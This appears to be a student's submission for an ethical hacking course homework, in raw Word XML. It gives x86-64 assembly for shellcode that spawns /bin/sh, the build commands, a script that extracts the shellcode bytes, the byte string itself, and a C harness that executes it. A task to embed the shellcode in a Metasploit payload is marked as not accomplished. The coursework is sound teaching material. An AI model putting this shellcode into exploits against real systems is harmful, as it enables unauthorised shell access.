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80.145454545454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EN.650.631 Ethical Hacking Home Work #2a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="220" w:line="295.8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examples such as [1] remind us that knowledge of core computer science courses is not a requirement to become an expert hacker. The only real requirements are a tenacious spirit and an analytical mind. Given these facts, please use your available resources to perform the below tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">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Given the assembly language (64-bit Linux) code supplied to you, please explain the code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">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explanation is in the video.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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Convert the supplied assembly language code into shellcode. What are the 3 steps that should be followed to transform assembly language code into shellcode?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">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In case to avoid \x00 in the shellcode, we have modified the original code to the following format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="280" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">global _start  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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_start:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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jmp DATA  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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SHELLCODE:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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xor rax, rax  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">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pop rbx  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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mov [rbx+7], al  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">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mov [rbx+8], rbx  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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mov [rbx+16], rax  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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push 59  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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pop rax  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">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lea rdi, [rbx]  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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lea rsi, [rbx+8]  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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lea rdx, [rbx+16]  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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syscall  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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DATA:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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call SHELLCODE  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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shellpath: db </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/sh0aaaaaaaabbbbbbbb"</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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="f8f8f8" w:val="clear"/>
        <w:spacing w:after="2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segment .data  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="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1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="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the assemble file to get an executable binary shell program </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands are </w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nasm -f elf64 shell_code_hw.asm -o shell_code_hw.o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ld shell_code_hw.o -o shell_code_hw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Then we have the compiled file</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shell_code_hw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="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binary shell program to x86_64 bit shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="144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write a shell program named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bin2shell.sh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convert. The code is shown as below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="280" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</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2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="f8f8f8" w:val="clear"/>
        <w:spacing w:after="20" w:before="0" w:beforeAutospacing="0" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i in $(objdump -d $1 |grep </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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> |cut -f2); </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo -n </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'\x'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$i; done;echo  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command to run the code is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">./bin2shell.sh shell_code_hw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we get the shell code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="20" w:before="280" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\xeb\x1f\x48\x31\xc0\x5b\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x43\x10\x6a\x3b\x58\x48\x8d\x3b\x48\x8d\x73\x08\x48\x8d\x53\x10\x0f\x05\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x30\x61\x61\x61\x61\x61\x61\x61\x61\x62\x62\x62\x62\x62\x62\x62\x62  </w:t>
      </w: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="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shellcode in C code(Show in task 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>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Before using the shellcode, you should test it. Write C code to directly test your shellcode. Hint…this is step #3 from question #2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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C code is as below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="6ce26c" w:space="0" w:sz="18" w:val="single"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="2" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="280" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include&lt;stdio.h&gt;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C">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color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include&lt;string.h&gt;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D">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E">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unsigned </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="2e8b57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">char</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> code[] = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"\xeb\x1f\x48\x31\xc0\x5b\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x43\x10\x6a\x3b\x58\x48\x8d\x3b\x48\x8d\x73\x08\x48\x8d\x53\x10\x0f\x05\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x30\x61\x61\x61\x61\x61\x61\x61\x61\x62\x62\x62\x62\x62\x62\x62\x62"</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F">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0">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main()  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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2">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3">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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Shellcode Length:  %d\n"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e8b57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)strlen(code));  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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5">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b w:val="1"/>
          <w:color w:val="2e8b57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (*ret)() = (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="2e8b57"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(*)())code;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Gungsuh" w:cs="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh"/>
          <w:color w:val="008200"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//声明一个函数指针  将code数组的地址转换同一类型的指针并赋值</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6">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7">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ret();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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9">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20" w:before="0" w:beforeAutospacing="0" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="144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3A">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="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commands are: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="160" w:firstLine="0"/>
        <w:jc w:val="both"/>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t xml:space="preserve">gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>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./shell-testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>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 is shown as below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="20" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="7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848" cy="4567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84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Demonstrate the capability of your shellcode by modifying an existing Metaspolit payload or stand alone program with your shellcode (i.e., instead of executing or reverse tcp functionality, execute your shellcode). Then use this modified payload in any Linux exploiting module or program against the appropriate vulnerable remote target.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="220" w:line="290.6181818181819" w:lineRule="auto"/>
        <w:ind w:left="1060" w:right="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Failed to accomplish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:after="160" w:line="356.0727272727274" w:lineRule="auto"/>
        <w:ind w:right="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5-minute (or less) video, explain and illustrate the results from your work above. You can work in groups of no more than two. Please email to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lanier.Watkins@jhuapl.edu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
